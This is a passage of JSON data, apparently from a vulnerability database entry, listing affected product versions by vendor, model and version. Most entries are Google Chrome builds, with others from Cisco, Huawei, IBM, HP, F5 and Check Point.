"version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.55" }, { "model": "ipso r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.97" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "elog v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.69" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.50" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.510" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.96" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77750" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "ipso r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.786.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.20" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.59" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1039.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.836.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.23" }, { "model": "oceanstor dorado2100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.1" }, { "model": "ace application control engine module for the cisco catalyst", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "6500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.591.0" }, { "model": "flex system 40gb ethernet", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.107" }, { "model": "secureplatform ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.278.0" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.413.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.95" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.67" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.580.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.146" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.4" }, { "model": "chrome", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.513.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.30" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1042" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.158.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.1" }, { "model": "oceanstor sns2120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.30" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.765.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.553.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.494.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.745.0" }, { "model": "ipso r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.484.0" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.52" }, { "model": "oceanstor cse v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.829.1" }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.35" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.482.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.32" }, { "model": "aura communication manager ssp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ipso r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.76" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.677.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.770.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.364.0" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "c-series nexus 5k switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.349.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.69" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.37" }, { "model": "workbench", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.15" }, { "model": "system storage san48b-5 2498-f48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "gaia r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.83" }, { "model": "gaia r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7845" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.63" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1297.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1026" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.33" }, { "model": "secureplatform r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.10" }, { "model": "fusionstorage dsware v100r003c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.1" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "secureplatform r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.3.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.1" }, { "model": "websphere process server hypervisor edition for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.884.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1038" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.621.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.310" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.14" }, { "model": "espace v1300n v1300n v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.36" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "puredata system for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1006" }, { "model": "smartcloud provisioning fixpack interi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.14" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.811.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.709.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.43" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.54" }, { "model": "oceanstor uds v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.882.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "enterprise linux eus 5.9.z server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.384.0" }, { "model": "secureplatform r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.19" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.44" }, { "model": "power hmc r7.7.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.1" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.563.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.24" }, { "model": "2417-c48", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.193.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.771.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.59" }, { "model": "enterprise s-jis service", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.43" }, { "model": "diagnostic server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.8" }, { "model": "oceanstor s5500 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.24" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.114" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.202" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.363.0" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.601.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": 